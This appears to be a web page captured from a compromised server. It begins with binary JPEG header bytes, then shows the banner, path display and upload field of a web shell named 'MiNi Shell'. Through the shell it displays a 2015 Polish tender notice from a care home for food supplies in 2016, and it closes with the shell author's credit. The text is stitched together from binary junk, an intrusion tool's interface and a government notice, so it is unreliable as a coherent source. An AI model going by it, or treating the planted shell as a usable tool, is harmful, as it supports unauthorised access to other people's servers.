JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151201/325898-N-2015.html

<p class="kh_header"><b>Bystrzyca Kłodzka: Dostawa artykułów spożywczych w 2016 roku CPV 15000000-8 Żywność, napoje, tytoń i produkty pokrewne</b><br>
<b>Numer ogłoszenia: 325898 - 2015; data zamieszczenia: 01.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Górna 23, 57-500 Bystrzyca Kłodzka, woj. dolnośląskie, tel. 0-74 8110555, faks 0-74 8110550.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dps.bystrzyca.bip-info.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych w 2016 roku CPV 15000000-8 Żywność, napoje, tytoń i produkty pokrewne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych w 2016 roku
CPV 15000000-8 Żywność, napoje, tytoń i produkty pokrewne pogrupowanych na  części:
Część I  - Drób CPV 15111200-6; Wieprzowina CPV 15113000-3
Część II - Produkty mięsno-wędliniarskie  CPV 15131100-6
Część III - Produkty mleczarskie  CPV 15500000-3; Margaryna i podobne produkty CPV 15431000-8
Część IV - Różne produkty spożywcze CPV 15800000-6; Jaja CPV 03142500-3; Oleje i tłuszcze zwierzęce lub roślinne CPV 15400000-2; Produkty przemiału ziarna, skrobi i produktów skrobiowych CPV 15600000-4
Część V -  Pieczywo, świeże wyroby piekarskie i ciastkarskie CPV 15810000-9 
Część VI - Owoce, warzywa i podobne produkty CPV 15300000-1 
Część VII - Ryby przetworzone i konserwowane CPV 15200000-01.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga się</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia warunku dokonana będzie według formuły spełnia/nie spełnia na podstawie przedłożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku wiedzy i doświadczenia wykonawca przedłoży wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów czy zostały wykonane lub są wykonywane należycie.
Wykaz powinien zawierać co najmniej 1 dostawę odpowiadającą wartością, ilością i asortymentem szczegółowemu spisowi przedmiotu zamówienia części przedmiotu zamówienia, na którą składana jest oferta. Ocena spełnienia warunku dokonana będzie według formuły spełnia/nie spełnia na podstawie przedłożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia warunku
dokonana będzie według formuły spełnia/nie spełnia na podstawie przedłożonych
dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia warunku
dokonana będzie według formuły spełnia/nie spełnia na podstawie przedłożonych
dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia warunku
dokonana będzie według formuły spełnia/nie spełnia na podstawie przedłożonych
dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę cen zawartych w ofercie wyłącznie w oparciu o wskaźnik cen towarów i usług konsumpcyjnych ogółem za kwartał 2016 roku ogłaszany komunikatem Prezesa GUS w Monitorze Polskim, jeżeli wskaźnik ten wzrośnie lub zmaleje o minimum 3%. Cena danych towarów może być w takim przypadku zmniejszona lub zwiększona o tyle procent o ile wzrośnie lub ulegnie zmniejszeniu wskaźnik cen towarów i usług konsumpcyjnych ogółem za kwartał danego roku.
Zmiana cen wymaga uprzedniego pisemnego zawiadomienia zamawiającego przez wykonawcę wraz ze wskazaniem podstawy zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dps.bystrzyca.bip-info.or<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej ul. Górna 23; 57-500 Bystrzyca Kłodzka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2015 godzina 11:00, miejsce: Dom Pomocy Społecznej ul.Górna 23; 57-500 Bystrzyca Kłodzka, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CPV 15111200-6 Drób, CPV 15113000-3 Wieprzowina.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurczaki
770 kg
Nogi z kurcząt
350 kg
Filet z kurczaka
150 kg
Wątroba drobiowa
60 kg
Łopatka b/k
650 kg
Mięso wieprzowe od szynki
150 kg
Karczek b/k
125 kg
Schab b/k
200 kg
Żeberka wieprzowe
110 kg
Filet z indyka
250 kg
Mięso gulaszowe z indyka
200 kg
Kości wieprzowe
170 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.30.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CPV 15131100-6 Produkty mięsno-wędliniarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szynka indycza
40 kg
Pieczeń dietetyczna
8 kg
Salceson z indyka
46 kg
Krakowska z indyka
46 kg
Szynka wieprzowa wiejska
105 kg
Smaczek w galarecie
58 kg
Baleron
45 kg
Polędwica sopocka
80 kg
Polędwica drobiowa
45 kg
Szynka konserwowa wieprzowa
135 kg
Schab biały - wędlina 
28,5 kg
Kurczak po staropolsku
10 kg
Pasztet kremowy drobiowy
45 kg
Pasztet kremowy wieprzowy
65 kg
Pasztet zapiekany
128 kg
Pasztet drobiowy 50g, bez konserwantów, bez glutaminianu, bez wieprzowiny
3000 szt
Kaszanka
96 kg
Salceson włoski
82 kg
Mortadela
80 kg
Kiełbasa szynkowa wieprzowa
65 kg
Kiełbasa szynkowa drobiowa
65 kg
Kiełbasa żywiecka
32 kg
Kiełbasa śląska
75 kg
Kiełbasa domowej roboty/wiejska
70 kg
Kiełbasa podwawelska
100 kg
Kiełbasa zielonogórska / luksusowa
73 kg
Kiełbasa biała parzona
105kg
Ogonówka
40 kg
Serdelki wieprzowe
150 kg
Parówki drobiowe
190 kg
Boczek wędzony
32 kg
Konserwa mięsna 330g
(zawartość mięsa wieprzowego min. 90%)
25 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CPV 15500000-3 Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko 2%
10865l
Mleko w proszku
 (zawartość tłuszczu min.26%)
75 kg
Śmietana 12%
430 l
Masło roślinne w kostce 250g
553kg
Masło śmietankowe ekstra w kostce 200g
365 kg
Margaryna do pieczenia ciast  w kostce 250 g (typu Palma z murzynkiem)
20 kg
Margaryna do smażenia w kostce 250g
200 kg
Twaróg
500 kg
Serek/twaróg śmietankowy
25 kg
Ser topiony
 różne smaki
90 kg
Ser topiony krążki
302 op
Ser topiony blok 100g
1206 szt
Ser żółty podpuszczkowy, pełnotłusty ( (zawartość tłuszczu min.40%)

270 kg
Serek twarogowo-śmietankowy w porcji 
(typu kiri, naturek)
330 op
Serek twarogowo-śmietankowy w porcji wielosmakowy 20g 
(typu tartare )
2000 szt
Serek smakowy 150g
1550 szt
Serek wiejski 150 g
1550 szt
Serek homogenizowany waniliowy 150 g
30 szt
Kefir 150g
310 szt
Jogurt owocowy 130g
3000szt
Jogurt naturalny 150 g
1500 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CPV 03142500-3 Jaja, CPV 15800000-6 Różne produkty spożywcze
CPV 15400000-2 Oleje i tłuszcze zwierzęce lub roślinne; 
CPV 15600000-4  Produkty przemiału ziarna, skrobi i produktów skrobiowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja (L 63g-73g)
22200 szt
Olej 1l
383 szt
Olej 0,5 l
40 szt
Ryż
207 kg
Mąka pszenna typ 500
610 kg
Płatki owsiane 0,5 kg
180 szt
Kasza manna
110 kg
Kasza kukurydziana
30 kg
Kasza gryczana
50 kg
Kasza jęczmienna
60 kg
Kleik ryżowy 300g
15 op
Mąka ziemniaczana
40 kg
Cukier kryształ
1500 kg
Cukier puder
10 kg
Sól
226 kg
Herbata czarna granulowana 100g 
1100 szt
Kawa zbożowa 1 kg
250 szt
Makaron różny
400 kg
Zacierka babuni 250g
20op
Ocet 1l
72 szt
Musztarda stołowa 
180 g
577 szt
Cynamon 20 g
56 szt
Przyprawa do piernika 20 g
6 szt
Gałka muszkatołowa 25g
16 szt
Kminek 40g 
40 op
Soda oczyszczona 70 g
10 szt
Proszek do pieczenia 40g
30  szt
Cukier waniliowy 30g
360 szt
Ketchup łagodny 0,5kg
102 szt
Kalafior mrożony
140 kg
Brokuł mrożony
20 kg
Dżem 330g
2300 szt
Syrop owocowy 330ml
150 szt
Miód naturalny 25 g
3800 szt
Kwasek cytrynowy 20g
20 szt
Kakao naturalne 200g
122 szt
Czekolada mleczna100g
100 szt
Wafelki kakaowe bez polewy 28g
1640 szt
Rodzynki w czekoladzie mlecznej 150g
100 op
Napój owocowy 200ml
100 szt
Ciastka - biszkopty z galaretką w czekoladzie 130g (typu delicje) 
100 op
Batonik czekoladowy nadziewany 50 g 
(typu Pawełek)
160 szt 
Chrzan w słoikach 
60 szt
Kukurydza konserwowa
130 szt
Imbir 20g
17 szt
Groszek konserwowy
75 szt
Koncentrat pomidorowy 30% 200g
110 szt
Sok pomidorowy 1l
130 szt
Biszkopty 150 g
5 op
Suchary 285g
10 op
Wiórka kokosowe 100g
5 op
Galaretka owocowa w proszku 
17szt
Śmietana w proszku typu śnieżka 
10 szt
Jabłka prażone 900g
10 szt
Goździki 
10 op.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3, 15.40.00.00-2, 15.60.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CPV 15810000-9  Pieczywo, świeże wyroby piekarskie i ciastkarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb pszenny krojony 0,6kg
8770szt.
Bułka paryska krojona 
0,4 kg
7867 szt.
Chleb graham krojony 
0,5 kg
2185 szt.
Bułki drożdżowe 120g
1323 szt.
Pączki 
316 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> CPV 15300000-1 Owoce, warzywa i podobne produkty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki
9000 kg
Ziemniaki młode (czerwiec, lipiec, sierpień)

3000 kg
Kapusta biała
400 kg
Kapusta młoda
223 szt
Kapusta pekińska
285 kg
Kapusta kiszona
350 kg
Kapusta czerwona
342 kg
Kapusta włoska
105 szt
Seler korzeń
210 kg
Seler młody z nacią
50 szt
Pietruszka korzeń
210 kg
Marchew
1400 kg
Sałata
240 szt
Burak czerwony
625 kg
Botwina pęczek
15 szt
Por kg
50 kg
Por szt.
155 szt
Papryka czerwona
52 kg
Pieczarki
20 kg
Cukinia
20 kg
Ogórek zielony szklarniowy
60 kg
Ogórek zielony gruntowy
90 kg
Kalafior (min.500g)
50 szt
Brokuł (min.500g)
20szt
Fasolka szparagowa
20 kg
Czosnek kg
15 kg
Rzodkiewka-pęczek
800 szt
Szczypior-pęczek
145 szt
Koper zielony-pęczek
325 szt
Pietruszka natka-pęczek
100 szt
Cebula
500 kg
Pomidor czerwiec-wrzesień
500 kg
Pomidor paźdźernik-maj
400 kg
Sałatki warzywne konserwowe 900g
70 szt
Sałatka szwedzka 900g
120 szt
Ogórki kiszone 
65 kg
Ogórki małosolne 
20 kg
Szczaw konserwowy 330g
40 szt
Papryka konserwowa  900g
120 szt
Ogórki konserwowe 900g
400 szt
Fasola sucha
50 kg
Groch suchy
20 kg
Jabłka
1150 kg
Cytryny
20 kg
Banany
200 kg
Mandarynka
20 kg
Nektaryna 
30 kg
Brzoskwinia puszka
5 szt
Kiwi kg
20 kg
Kiwi koszyk 
12 szt
Susz owocowy - mieszanka 250g
15 op
Grzyby suszone - podgrzybek
0,5 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> CPV 15200000-0 Ryby przetworzone i konserwowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet mrożony z miruny, 
bez skóry, 110-170g shaterrpack
300 kg
Makrela wędzona
66 kg
Konserwa rybna w pomidorach  330g
994 szt
Śledzie matias
180 kg
Sałatka śledziowa
30 kg
Masełko rybne
45 kg
Tuńczyk w kawałkach w sosie własnym konserwa 170g
455 szt
Karp żywy
8 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com